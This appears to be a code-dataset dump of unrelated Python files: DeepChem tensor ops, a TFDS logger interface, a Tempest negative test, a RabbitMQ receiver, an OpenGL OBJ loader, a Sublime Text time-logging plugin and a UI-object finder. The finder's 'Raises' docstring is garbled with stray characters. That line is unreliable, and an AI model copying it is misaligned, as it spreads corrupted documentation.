variable, value, momentum, zero_debias=False)
except TypeError:
return moving_averages.assign_moving_average(variable, value, momentum)
def int_shape(x):
"""Returns the shape of a Keras tensor or a Keras variable as a tuple of
integers or None entries.
Arguments
---------
x: Tensor or variable.
Returns
-------
A tuple of integers (or None entries).
"""
shape = x.get_shape()
return tuple([i.__int__() for i in shape])
def get_uid(prefix=''):
"""Provides a unique UID given a string prefix.
Parameters
----------
prefix: string.
Returns
-------
An integer.
"""
_UID_PREFIXES[prefix] += 1
return _UID_PREFIXES[prefix]
def concatenate(tensors, axis=-1):
"""Concatenates a list of tensors alongside the specified axis.
Returns
-------
A tensor.
"""
if axis < 0:
dims = get_ndim(tensors[0])
if dims:
axis = axis % dims
else:
axis = 0
try:
return tf.concat_v2([x for x in tensors], axis)
except AttributeError:
return tf.concat(axis=axis, values=[x for x in tensors])
def _normalize_axis(axis, ndim):
if isinstance(axis, tuple):
axis = list(axis)
if isinstance(axis, list):
for i, a in enumerate(axis):
if a is not None and a < 0:
axis[i] = a % ndim
else:
if axis is not None and axis < 0:
axis = axis % ndim
return axis
def mean(x, axis=None, keepdims=False):
"""Mean of a tensor, alongside the specified axis.
Parameters
----------
x: A tensor or variable.
axis: A list of integer. Axes to compute the mean.
keepdims: A boolean, whether to keep the dimensions or not.
If keepdims is False, the rank of the tensor is reduced
by 1 for each entry in axis. If keep_dims is True,
the reduced dimensions are retained with length 1.
Returns
-------
A tensor with the mean of elements of x.
"""
axis = _normalize_axis(axis, get_ndim(x))
if x.dtype.base_dtype == tf.bool:
x = tf.cast(x, tf.float32)
return tf.reduce_mean(x, axis=axis, keep_dims=keepdims)
def dot(x, y):
"""Multiplies 2 tensors (and/or variables) and returns a *tensor*.
When attempting to multiply a ND tensor
with a ND tensor, it reproduces the Theano behavior.
(e.g. (2, 3).(4, 3, 5) = (2, 4, 5))
Parameters
----------
x: Tensor or variable.
y: Tensor or variable.
Returns
-------
A tensor, dot product of x and y.
"""
if get_ndim(x) is not None and (get_ndim(x) > 2 or get_ndim(y) > 2):
x_shape = []
for i, s in zip(int_shape(x), tf.unstack(tf.shape(x))):
if i is not None:
x_shape.append(i)
else:
x_shape.append(s)
x_shape = tuple(x_shape)
y_shape = []
for i, s in zip(int_shape(y), tf.unstack(tf.shape(y))):
if i is not None:
y_shape.append(i)
else:
y_shape.append(s)
y_shape = tuple(y_shape)
y_permute_dim = list(range(get_ndim(y)))
y_permute_dim = [y_permute_dim.pop(-2)] + y_permute_dim
xt = tf.reshape(x, [-1, x_shape[-1]])
yt = tf.reshape(tf.transpose(y, perm=y_permute_dim), [y_shape[-2], -1])
return tf.reshape(
tf.matmul(xt, yt), x_shape[:-1] + y_shape[:-2] + y_shape[-1:])
out = tf.matmul(x, y)
return out
def get_ndim(x):
"""Returns the number of axes in a tensor, as an integer.
Parameters
----------
x: Tensor or variable.
Returns
-------
Integer (scalar), number of axes.
"""
dims = x.get_shape()._dims
if dims is not None:
return len(dims)
return None
def get_dtype(x):
"""Returns the dtype of a Keras tensor or variable, as a string.
Parameters
----------
x: Tensor or variable.
Returns
-------
String, dtype of `x`.
"""
return x.dtype.name
def clip(x, min_value, max_value):
"""Element-wise value clipping.
Returns
-------
A tensor.
"""
if max_value is not None and max_value < min_value:
max_value = min_value
min_value = _to_tensor(min_value, x.dtype.base_dtype)
max_value = _to_tensor(max_value, x.dtype.base_dtype)
return tf.clip_by_value(x, min_value, max_value)
def epsilon():
"""Returns the value of the fuzz
factor used in numeric expressions.
Returns
-------
A float.
"""
return 1e-7
def random_uniform_variable(shape,
low,
high,
dtype=tf.float32,
name=None,
seed=None):
"""Instantiates an variable filled with
samples drawn from a uniform distribution and returns it.
Parameters
----------
shape: Tuple of integers, shape of returned variable.
low: Float, lower boundary of the output inteval.
high: Float, upper boundary of the output interval.
dtype: Tensorflow dtype
name: String, name of returned variable.
seed: Integer, random seed.
Returns
-------
A tf.Variable, filled with drawn samples.
"""
shape = tuple(map(int, shape))
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = tf.random_uniform_initializer(
low, high, dtype=dtype, seed=seed)(shape)
return tf.Variable(value, dtype=dtype, name=name)
def random_normal_variable(shape,
mean,
scale,
dtype=tf.float32,
name=None,
seed=None):
"""Instantiates an Keras variable filled with
samples drawn from a normal distribution and returns it.
Parameters
----------
shape: Tuple of integers, shape of returned Keras variable.
mean: Float, mean of the normal distribution.
scale: Float, standard deviation of the normal distribution.
dtype: Tensorflow dtype
name: String, name of returned Keras variable.
seed: Integer, random seed.
Returns
-------
A tf.Variable, filled with drawn samples.
"""
shape = tuple(map(int, shape))
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e8)
value = tf.random_normal_initializer(
mean, scale, dtype=dtype, seed=seed)(shape)
return tf.Variable(value, dtype=dtype, name=name)
def max(x, axis=None, keepdims=False):
"""Maximum value in a tensor.
Parameters
----------
x: A tensor or variable.
axis: An integer, the axis to find maximum values.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`,
the reduced dimension is retained with length 1.
Returns
-------
A tensor with maximum values of `x`.
"""
axis = _normalize_axis(axis, get_ndim(x))
return tf.reduce_max(x, axis=axis, keep_dims=keepdims)
def l2_normalize(x, axis):
"""Normalizes a tensor wrt the L2 norm alongside the specified axis.
Parameters
----------
x: input tensor.
axis: axis along which to perform normalization.
Returns
-------
A tensor.
"""
if axis < 0:
axis = axis % len(x.get_shape())
return tf.nn.l2_normalize(x, dim=axis)
def categorical_crossentropy(output, target, from_logits=False):
"""Categorical crossentropy between an output tensor
and a target tensor, where the target is a tensor of the same
shape as the output.
# TODO(rbharath): Should probably swap this over to tf mode.
"""
# Note: tf.nn.softmax_cross_entropy_with_logits
# expects logits, Keras expects probabilities.
if not from_logits:
# scale preds so that the class probas of each sample sum to 1
output /= tf.reduce_sum(
output, axis=len(output.get_shape()) - 1, keep_dims=True)
# manual computation of crossentropy
epsilon = _to_tensor(_EPSILON, output.dtype.base_dtype)
output = tf.clip_by_value(output, epsilon, 1. - epsilon)
return -tf.reduce_sum(
target * tf.log(output), axis=len(output.get_shape()) - 1)
else:
try:
return tf.nn.softmax_cross_entropy_with_logits(
labels=target, logits=output)
except TypeError:
return tf.nn.softmax_cross_entropy_with_logits(
logits=output, labels=target)
def sparse_categorical_crossentropy(output, target, from_logits=False):
"""Categorical crossentropy between an output tensor
and a target tensor, where the target is an integer tensor.
"""
# Note: tf.nn.softmax_cross_entropy_with_logits
# expects logits, Keras expects probabilities.
if not from_logits:
epsilon = _to_tensor(_EPSILON, output.dtype.base_dtype)
output = tf.clip_by_value(output, epsilon, 1 - epsilon)
output = tf.log(output)
output_shape = output.get_shape()
targets = cast(flatten(target), 'int64')
logits = tf.reshape(output, [-1, int(output_shape[-1])])
try:
res = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
except TypeError:
res = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits, labels=targets)
if len(output_shape) == 3:
# if our output includes timesteps we need to reshape
return tf.reshape(res, tf.shape(output)[:-1])
else:
return res
def binary_crossentropy(output, target, from_logits=False):
"""Binary crossentropy between an output tensor and a target tensor.
# Arguments
output: A tensor.
target: A tensor with the same shape as `output`.
from_logits: Whether `output` is expected to be a logits tensor.
By default, we consider that `output`
encodes a probability distribution.
# Returns
A tensor.
"""
# Note: tf.nn.softmax_cross_entropy_with_logits
# expects logits, Keras expects probabilities.
if not from_logits:
# transform back to logits
epsilon = _to_tensor(_EPSILON, output.dtype.base_dtype)
output = tf.clip_by_value(output, epsilon, 1 - epsilon)
output = tf.log(output / (1 - output))
try:
return tf.nn.sigmoid_cross_entropy_with_logits(labels=target, logits=output)
except TypeError:
return tf.nn.sigmoid_cross_entropy_with_logits(logits=output, labels=target)
def sum(x, axis=None, keepdims=False):
"""Sum of the values in a tensor, alongside the specified axis.
Parameters
----------
x: A tensor or variable.
axis: An integer, the axis to sum over.
keepdims: A boolean, whether to keep the dimensions or not.
If keepdims is False, the rank of the tensor is reduced
by 1. If keepdims is True,
the reduced dimension is retained with length 1.
Returns
-------
A tensor with sum of x.
"""
axis = _normalize_axis(axis, get_ndim(x))
return tf.reduce_sum(x, axis=axis, keep_dims=keepdims)
# TODO(rbharath): Need to rename this. This makes a variable, not just creates
# a tensor. Confusing with tf.zeros...
def zeros(shape, dtype=tf.float32, name=None):
"""Instantiates an all-zeros variable and returns it.
Parameters
----------
shape: Tuple of integers, shape of returned Keras variable
dtype: Tensorflow dtype
name: String, name of returned Keras variable
Returns
-------
A variable (including Keras metadata), filled with `0.0`.
"""
shape = tuple(map(int, shape))
return tf.Variable(
tf.constant_initializer(0., dtype=dtype)(shape), dtype, name)
def cosine_distances(test, support):
"""Computes pairwise cosine distances between provided tensors
Parameters
----------
test: tf.Tensor
Of shape (n_test, n_feat)
support: tf.Tensor
Of shape (n_support, n_feat)
Returns
-------
tf.Tensor:
Of shape (n_test, n_support)
"""
rnorm_test = tf.rsqrt(
tf.reduce_sum(tf.square(test), 1, keep_dims=True)) + 1e-7
rnorm_support = tf.rsqrt(
tf.reduce_sum(tf.square(support), 1, keep_dims=True)) + 1e-7
test_normalized = test * rnorm_test
support_normalized = support * rnorm_support
# Transpose for mul
support_normalized_t = tf.transpose(support_normalized, perm=[1, 0])
g = tf.matmul(test_normalized, support_normalized_t) # Gram matrix
return g
def elu(x, alpha=1.):
"""Exponential linear unit.
Parameters
----------
x: A tensor or variable to compute the activation function for.
alpha: A scalar, slope of positive section.
Returns
-------
A tensor.
"""
res = tf.nn.elu(x)
if alpha == 1:
return res
else:
return tf.where(x > 0, res, alpha * res)
def relu(x, alpha=0., max_value=None):
"""Rectified linear unit.
With default values, it returns element-wise `max(x, 0)`.
Parameters
----------
x: A tensor or variable.
alpha: A scalar, slope of negative section (default=`0.`).
max_value: Saturation threshold.
Returns
-------
A tensor.
"""
if alpha != 0.:
negative_part = tf.nn.relu(-x)
x = tf.nn.relu(x)
if max_value is not None:
max_value = _to_tensor(max_value, x.dtype.base_dtype)
zero = _to_tensor(0., x.dtype.base_dtype)
x = tf.clip_by_value(x, zero, max_value)
if alpha != 0.:
alpha = _to_tensor(alpha, x.dtype.base_dtype)
x -= alpha * negative_part
return x
def hard_sigmoid(x):
"""Segment-wise linear approximation of sigmoid.
Faster than sigmoid.
Returns 0. if x < -2.5, 1. if x > 2.5.
In -2.5 <= x <= 2.5, returns 0.2 * x + 0.5.
Parameters
----------
x: A tensor or variable.
Returns
-------
A tensor.
"""
x = (0.2 * x) + 0.5
zero = _to_tensor(0., x.dtype.base_dtype)
one = _to_tensor(1., x.dtype.base_dtype)
x = tf.clip_by_value(x, zero, one)
return x
def sqrt(x):
"""Element-wise square root.
Parameters
----------
x: input tensor.
Returns
-------
A tensor.
"""
zero = _to_tensor(0., x.dtype.base_dtype)
inf = _to_tensor(np.inf, x.dtype.base_dtype)
x = tf.clip_by_value(x, zero, inf)
return tf.sqrt(x)
def var(x, axis=None, keepdims=False):
"""Variance of a tensor, alongside the specified axis.
Parameters
----------
x: A tensor or variable.
axis: An integer, the axis to compute the variance.
keepdims: A boolean, whether to keep the dimensions or not.
If keepdims is False, the rank of the tensor is reduced
by 1. If keepdims is True,
the reduced dimension is retained with length 1.
Returns
-------
A tensor with the variance of elements of `x`.
"""
axis = _normalize_axis(axis, get_ndim(x))
if x.dtype.base_dtype == tf.bool:
x = tf.cast(x, tf.float32)
m = tf.reduce_mean(x, axis=axis, keep_dims=True)
devs_squared = tf.square(x - m)
return tf.reduce_mean(devs_squared, axis=axis, keep_dims=keepdims)
def euclidean_distance(test, support, max_dist_sq=20):
"""Computes pairwise euclidean distances between provided tensors
TODO(rbharath): BROKEN! THIS DOESN'T WORK!
Parameters
----------
test: tf.Tensor
Of shape (n_test, n_feat)
support: tf.Tensor
Of shape (n_support, n_feat)
max_dist_sq: float, optional
Maximum pairwise distance allowed.
Returns
-------
tf.Tensor:
Of shape (n_test, n_support)
"""
test = tf.expand_dims(test, 1)
support = tf.expand_dims(support, 0)
g = -tf.maximum(tf.reduce_sum(tf.square(test - support), 2), max_dist_sq)
return g
def add_bias(tensor, init=None, name=None):
"""Add a bias term to a tensor.
Parameters
----------
tensor: tf.Tensor
Variable tensor.
init: float
Bias initializer. Defaults to zero.
name: str
Name for this op. Defaults to tensor.op.name.
Returns
-------
tf.Tensor
A biased tensor with the same shape as the input tensor.
"""
if init is None:
init = tf.zeros([tensor.get_shape()[-1].value])
with tf.name_scope(name, tensor.op.name, [tensor]):
b = tf.Variable(init, name='b')
return tf.nn.bias_add(tensor, b)
def dropout(tensor, dropout_prob, training=True, training_only=True):
"""Random dropout.
This implementation supports "always-on" dropout (training_only=False), which
can be used to calculate model uncertainty. See Gal and Ghahramani,
http://arxiv.org/abs/1506.02142.
NOTE(user): To simplify the implementation, I have chosen not to reverse
the scaling that occurs in tf.nn.dropout when using dropout during
inference. This shouldn't be an issue since the activations will be scaled
by the same constant in both training and inference. This means that there
are no training-time differences between networks that use dropout during
inference and those that do not.
Parameters
----------
tensor: tf.Tensor
Input tensor.
dropout_prob: float
Float giving dropout probability for weights (NOT keep probability).
training_only: bool
Boolean. If True (standard dropout), apply dropout only
during training. If False, apply dropout during inference as well.
Returns
-------
tf.Tensor:
A tensor with the same shape as the input tensor.
"""
if not dropout_prob:
return tensor # do nothing
keep_prob = 1.0 - dropout_prob
if training or not training_only:
tensor = tf.nn.dropout(tensor, keep_prob)
return tensor
def fully_connected_layer(tensor,
size=None,
weight_init=None,
bias_init=None,
name=None):
"""Fully connected layer.
Parameters
----------
tensor: tf.Tensor
Input tensor.
size: int
Number of output nodes for this layer.
weight_init: float
Weight initializer.
bias_init: float
Bias initializer.
name: str
Name for this op. Defaults to 'fully_connected'.
Returns
-------
tf.Tensor:
A new tensor representing the output of the fully connected layer.
Raises
------
ValueError
If input tensor is not 2D.
"""
###################################################### DEBUG
#print("fully_connected_layer")
#print("tensor")
#print(tensor)
###################################################### DEBUG
if weight_init is None:
num_features = tensor.get_shape()[-1].value
weight_init = tf.truncated_normal([num_features, size], stddev=0.01)
if bias_init is None:
bias_init = tf.zeros([size])
with tf.name_scope(name, 'fully_connected', [tensor]):
w = tf.Variable(weight_init, name='w', dtype=tf.float32)
b = tf.Variable(bias_init, name='b', dtype=tf.float32)
return tf.nn.xw_plus_b(tensor, w, b)
def weight_decay(penalty_type, penalty):
"""Add weight decay.
Args:
model: TensorflowGraph.
Returns:
A scalar tensor containing the weight decay cost.
Raises:
NotImplementedError: If an unsupported penalty type is requested.
"""
variables = []
# exclude bias variables
for v in tf.trainable_variables():
if v.get_shape().ndims == 2:
variables.append(v)
with tf.name_scope('weight_decay'):
if penalty_type == 'l1':
cost = tf.add_n([tf.reduce_sum(tf.abs(v)) for v in variables])
elif penalty_type == 'l2':
cost = tf.add_n([tf.nn.l2_loss(v) for v in variables])
else:
raise NotImplementedError('Unsupported penalty_type %s' % penalty_type)
cost *= penalty
#tf.scalar_summary('Weight Decay Cost', cost)
return cost
def multitask_logits(features,
num_tasks,
num_classes=2,
weight_init=None,
bias_init=None,
dropout_prob=None,
name=None):
"""Create a logit tensor for each classification task.
Args:
features: A 2D tensor with dimensions batch_size x num_features.
num_tasks: Number of classification tasks.
num_classes: Number of classes for each task.
weight_init: Weight initializer.
bias_init: Bias initializer.
dropout_prob: Float giving dropout probability for weights (NOT keep
probability).
name: Name for this op. Defaults to 'multitask_logits'.
Returns:
A list of logit tensors; one for each classification task.
"""
logits_list = []
with tf.name_scope('multitask_logits'):
for task_idx in range(num_tasks):
with tf.name_scope(name,
('task' + str(task_idx).zfill(len(str(num_tasks)))),
[features]):
logits_list.append(
logits(
features,
num_classes,
weight_init=weight_init,
bias_init=bias_init,
dropout_prob=dropout_prob))
return logits_list
def logits(features,
num_classes=2,
weight_init=None,
bias_init=None,
dropout_prob=None,
name=None):
"""Create a logits tensor for a single classification task.
You almost certainly don't want dropout on there -- it's like randomly setting
the (unscaled) probability of a target class to 0.5.
Args:
features: A 2D tensor with dimensions batch_size x num_features.
num_classes: Number of classes for each task.
weight_init: Weight initializer.
bias_init: Bias initializer.
dropout_prob: Float giving dropout probability for weights (NOT keep
probability).
name: Name for this op.
Returns:
A logits tensor with shape batch_size x num_classes.
"""
with tf.name_scope(name, 'logits', [features]) as name:
return dropout(
fully_connected_layer(
features,
num_classes,
weight_init=weight_init,
bias_init=bias_init,
name=name), dropout_prob)
def softmax_N(tensor, name=None):
"""Apply softmax across last dimension of a tensor.
Args:
tensor: Input tensor.
name: Name for this op. If None, defaults to 'softmax_N'.
Returns:
A tensor with softmax-normalized values on the last dimension.
"""
with tf.name_scope(name, 'softmax_N', [tensor]):
exp_tensor = tf.exp(tensor)
reduction_indices = [tensor.get_shape().ndims - 1]
return tf.div(exp_tensor,
tf.reduce_sum(
exp_tensor, axis=reduction_indices, keep_dims=True))
def optimizer(optimizer="adam", learning_rate=.001, momentum=.9):
"""Create model optimizer.
Parameters
----------
optimizer: str, optional
Name of optimizer
learning_rate: float, optional
Learning rate for algorithm
momentum: float, optional
Momentum rate
Returns
-------
A training Optimizer.
Raises:
NotImplementedError: If an unsupported optimizer is requested.
"""
# TODO(user): gradient clipping (see Minimize)
if optimizer == 'adagrad':
train_op = tf.train.AdagradOptimizer(learning_rate)
elif optimizer == 'adam':
train_op = tf.train.AdamOptimizer(learning_rate)
elif optimizer == 'momentum':
train_op = tf.train.MomentumOptimizer(learning_rate, momentum)
elif optimizer == 'rmsprop':
train_op = tf.train.RMSPropOptimizer(learning_rate, momentum)
elif optimizer == 'sgd':
train_op = tf.train.GradientDescentOptimizer(learning_rate)
else:
raise NotImplementedError('Unsupported optimizer %s' % optimizer)
return train_op
|
joegomes/deepchem
|
deepchem/nn/model_ops.py
|
Python
|
mit
| 27,568
|
from target import *
<error descr="Unresolved reference 'xyzzy'">x<caret>yzzy</error>
shazam()
|
asedunov/intellij-community
|
python/testData/inspections/importFromModuleStar/source.py
|
Python
|
apache-2.0
| 96
|
# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the methods a logger implementation should define."""
from typing import Dict, Optional, Union
from tensorflow_datasets.core import splits as splits_lib
from tensorflow_datasets.core.utils import read_config as tfds_read_config
class Logger:
"""Defines interface any TFDS logger must implement.
Registered loggers methods are called on TFDS events, synchronously, from the
same thread the call was made, in sequence, and in registration order.
Exceptions are *NOT* caught.
"""
def as_dataset(
self,
*,
dataset_name: str,
config_name: Optional[str],
version: str,
data_path: str,
split: Union[str, splits_lib.ReadInstruction],
batch_size: Optional[int],
shuffle_files: bool,
read_config: tfds_read_config.ReadConfig,
as_supervised: bool,
decoders: Dict[str, str],
):
"""Callback called when user calls `dataset_builder.as_dataset`.
Callback is also triggered by `tfds.load`, which calls `as_dataset`.
The logger MUST NOT mutate passed objects (decoders, read_config, ...).
Args:
dataset_name: the name of the dataset. E.g.: "mnist".
config_name: the name of the config or None.
version: the dataset version. E.g.: "1.2.3".
data_path: The path to directory of the dataset loaded. E.g.:
"/home/alice/.tensorflow_datasets/mnist/1.2.3".
split: name of the split requested by user. 'all' for all splits.
batch_size: See DatasetBuilder.as_dataset docstring.
shuffle_files: -
read_config: -
as_supervised: -
decoders: flatten dict of decoders dict given to `as_dataset`, with the
values being `{module_name}.{class_name}` instad of a
"""
raise NotImplementedError
|
tensorflow/datasets
|
tensorflow_datasets/core/logging/base_logger.py
|
Python
|
apache-2.0
| 2,385
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.compute import base
from tempest import config
from tempest import test
CONF = config.CONF
class FloatingIPDetailsNegativeTestJSON(base.BaseV2ComputeTest):
@classmethod
def setup_clients(cls):
super(FloatingIPDetailsNegativeTestJSON, cls).setup_clients()
cls.client = cls.floating_ips_client
@test.attr(type=['negative'])
@test.idempotent_id('7ab18834-4a4b-4f28-a2c5-440579866695')
@test.services('network')
def test_get_nonexistent_floating_ip_details(self):
# Negative test:Should not be able to GET the details
# of non-existent floating IP
# Creating a non-existent floatingIP id
if CONF.service_available.neutron:
non_exist_id = str(uuid.uuid4())
else:
non_exist_id = data_utils.rand_int_id(start=999)
self.assertRaises(lib_exc.NotFound,
self.client.get_floating_ip_details, non_exist_id)
|
danielmellado/tempest
|
tempest/api/compute/floating_ips/test_list_floating_ips_negative.py
|
Python
|
apache-2.0
| 1,698
|
#!/usr/bin/env python
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
print ' [*] Waiting for messages. To exit press CTRL+C'
def callback(ch, method, properties, body):
print " [x] Received %r" % (body,)
channel.basic_consume(callback,
queue='hello',
no_ack=True)
channel.start_consuming()
|
obulpathi/rabbitmq
|
receive.py
|
Python
|
gpl-2.0
| 469
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
import os.path
class Material(object):
def __init__(self):
self.name = ""
self.texture_fname = None
self.texture_id = None
class FaceGroup(object):
def __init__(self):
self.tri_indices = []
self.material_name = ""
class Model3D(object):
def __init__(self):
self.vertices = []
self.tex_coords = []
self.normals = []
self.materials = {}
self.face_groups = []
self.display_list_id = None
def __del__(self):
#Called when the model is cleaned up by Python
self.free_resources()
def free_resources(self):
# Delete the display list and textures
if self.display_list_id is not None:
glDeleteLists(self.display_list_id, 1)
self.display_list_id = None
# Delete any textures we used
for material in self.materials.values():
if material.texture_id is not None:
glDeleteTextures(material.texture_id)
# Clear all the materials
self.materials.clear()
# Clear the geometry lists
del self.vertices[:]
del self.tex_coords[:]
del self.normals[:]
del self.face_groups[:]
def read_obj(self, fname):
current_face_group = None
file_in = open(fname)
for line in file_in:
# Parse command and data from each line
words = line.split()
command = words[0]
data = words[1:]
if command == 'mtllib': # Material library
model_path = os.path.split(fname)[0]
mtllib_path = os.path.join( model_path, data[0] )
self.read_mtllib(mtllib_path)
elif command == 'v': # Vertex
x, y, z = data
vertex = (float(x), float(y), float(z))
self.vertices.append(vertex)
elif command == 'vt': # Texture coordinate
s, t = data
tex_coord = (float(s), float(t))
self.tex_coords.append(tex_coord)
elif command == 'vn': # Normal
x, y, z = data
normal = (float(x), float(y), float(z))
self.normals.append(normal)
elif command == 'usemtl' : # Use material
current_face_group = FaceGroup()
current_face_group.material_name = data[0]
self.face_groups.append( current_face_group )
elif command == 'f':
assert len(data) == 3, "Sorry, only triangles are supported"
# Parse indices from triples
for word in data:
vi, ti, ni = word.split('/')
indices = (int(vi) - 1, int(ti) - 1, int(ni) - 1)
current_face_group.tri_indices.append(indices)
for material in self.materials.values():
model_path = os.path.split(fname)[0]
texture_path = os.path.join(model_path, material.texture_fname)
texture_surface = pygame.image.load(texture_path)
texture_data = pygame.image.tostring(texture_surface, 'RGB', True)
material.texture_id = glGenTextures(1)
glBindTexture(GL_TEXTURE_2D, material.texture_id)
glTexParameteri( GL_TEXTURE_2D,
GL_TEXTURE_MAG_FILTER,
GL_LINEAR)
glTexParameteri( GL_TEXTURE_2D,
GL_TEXTURE_MIN_FILTER,
GL_LINEAR_MIPMAP_LINEAR)
glPixelStorei(GL_UNPACK_ALIGNMENT,1)
width, height = texture_surface.get_rect().size
gluBuild2DMipmaps( GL_TEXTURE_2D,
3,
width,
height,
GL_RGB,
GL_UNSIGNED_BYTE,
texture_data)
def read_mtllib(self, mtl_fname):
file_mtllib = open(mtl_fname)
for line in file_mtllib:
words = line.split()
command = words[0]
data = words[1:]
if command == 'newmtl':
material = Material()
material.name = data[0]
self.materials[data[0]] = material
elif command == 'map_Kd':
material.texture_fname = data[0]
def draw(self):
vertices = self.vertices
tex_coords = self.tex_coords
normals = self.normals
for face_group in self.face_groups:
material = self.materials[face_group.material_name]
glBindTexture(GL_TEXTURE_2D, material.texture_id)
glBegin(GL_TRIANGLES)
for vi, ti, ni in face_group.tri_indices:
glTexCoord2fv( tex_coords[ti] )
glNormal3fv( normals[ni] )
glVertex3fv( vertices[vi] )
glEnd()
def draw_quick(self):
if self.display_list_id is None:
self.display_list_id = glGenLists(1)
glNewList(self.display_list_id, GL_COMPILE)
self.draw()
glEndList()
glCallList(self.display_list_id)
|
MaxWayne/Beginning-Game-Development-with-Python-and-Pygame
|
Chapter 12/model3d.py
|
Python
|
mit
| 5,468
|
#
# FileLogger
#
# Copyright (c) Ryan Kadwell <ryan@riaka.ca>
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
# Logs time based on what file is active in sublime. Logs are stored in:
# ${HOME}/.worklogs/[DATE]
#
# Author: Ryan Kadwell <ryan@riaka.ca>
#
import sublime_plugin
import time
import datetime
import os
class FileLogger(sublime_plugin.EventListener):
"""
Keeps track of what files are being worked on at what times.
This provides a blunt method for tracking time based on what files are
being used through sublime text.
"""
timestart = 0
timeend = 0
lastfile = ''
def on_activated(self, view):
self.timestart = time.time()
def on_deactivated(self, view):
self.timeend = time.time()
if view.file_name() != self.lastfile and view.file_name() and self.timestart:
# name the file after the start date
file_name = datetime.datetime.fromtimestamp(self.timestart).strftime('%Y-%m-%d')
start = datetime.datetime.fromtimestamp(self.timestart).strftime('%H:%M:%S')
end = datetime.datetime.fromtimestamp(self.timeend).strftime('%H:%M:%S')
directory = os.path.join(os.path.expanduser("~"), ".worklogs")
if not os.path.exists(directory):
os.makedirs(directory)
f = open(os.path.join(directory, file_name), 'a+')
f.write(str(start) + "\t" + str(end) + "\t" + str(view.file_name()) + os.linesep)
self.lastfile = view.file_name()
|
ryakad/sublime-filelogger
|
FileLogger.py
|
Python
|
mit
| 1,599
|
# -*- coding: utf-8 -*-
"""UiObject finder
:copyright: (c) 2015 by tksn
:license: MIT
"""
from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
"""Locator for locating a UI object on the screen"""
def __init__(self, filters, index=None):
"""Initialize locator object
Args:
filters (dict): Key-value pairs which are used as filter conditions
to filter out UI Objects.
index (int): Index in a list which is yielded by applying
filters. It is used to identify the UI object.
When filters are enough to filter out UI objects to one single
object, index is not used and can be None.
"""
self._filters = filters
self._index = index
self._meta = None
def set_meta(self, meta):
"""Set meta information"""
self._meta = meta
@property
def meta(self):
"""Meta information aquired on search"""
return self._meta
@property
def filters(self):
"""Filter conditions which is used to identify a UI object"""
return self._filters
@property
def index(self):
"""Index in filter results, which is used to identify a UI object"""
return self._index
class UiObjectFinder(object):
"""Finder to spot a UI object for provided conditions"""
_FIND_OBJECT_DISTANCE_THRESH = 200
def __init__(self, hierarchy_dump):
"""Initialize finder object
Args:
hierarchy_dump (object): UI hierarchy dump object
"""
self._hierarchy_dump = hierarchy_dump
def find_object_contains(self, coord, ignore_distant, **criteria):
"""Find an object of which rect contains given coordinates
and meeds given criteria.
Args:
coord (tuple): Coordinates (x, y)
ignore_distant (bool):
Boolean flag which specifies whether it ignores
UI objects of which center are too far from coord.
criteria (dict):
Optional key-value pairs which filter search result
Returns:
locator object
Raiseafes:
eafe UiObjectNotFound: If there is no such object corresponds to
f given coordinates and criteria.
"""
# Find all objects which contain (x, y)
objects_iter = self._find_objects_contains(
coord, ignore_distant, **criteria)
# Pick an object which has smallest area
smallest = self._select_smallest_object(objects_iter)
if smallest is None:
raise UiObjectNotFound('({0}, {1})'.format(*coord))
# Try finding filters which can uniquely identify an object
locator = self._determine_locator(smallest['object'])
# If failed, Use index in addition to filters
locator = locator or UiObjectLocator(
filters=criteria, index=smallest['index'])
locator.set_meta(smallest['object'])
return locator
def _find_objects_contains(self, coord, ignore_distant, **criteria):
"""Find UI object of which rect contains coord"""
# pylint: disable=invalid-name
T, L, B, R = 'top', 'left', 'bottom', 'right'
x, y = coord
def xy_in_rect(r):
"""Check xy is in rect r"""
if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
return False
if ignore_distant:
r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
distance = math.hypot(x - r_x, y - r_y)
return distance < self._FIND_OBJECT_DISTANCE_THRESH
return True
objects = self._hierarchy_dump.find_objects(**criteria)
for i, obj in enumerate(objects):
if xy_in_rect(obj['visibleBounds']):
yield (i, obj)
@staticmethod
def _select_smallest_object(object_enum):
"""Select the smallest UI object from a set of UI objects"""
def rect_area(rect):
"""Returns area of rect"""
return ((rect['bottom'] - rect['top']) *
(rect['right'] - rect['left']))
min_obj = sentinel = (sys.maxsize, )
for i, obj in object_enum:
area = rect_area(obj['visibleBounds'])
if area < min_obj[0]:
min_obj = (area, i, obj)
if min_obj is sentinel:
return None
return {'index': min_obj[1], 'object': min_obj[2]}
def _determine_locator(self, info):
"""Determine locator which identifies one single UI object"""
def unique(**criteria):
"""Check if given criteria finds single UI object"""
objects = list(self._hierarchy_dump.find_objects(**criteria))
return len(objects) == 1
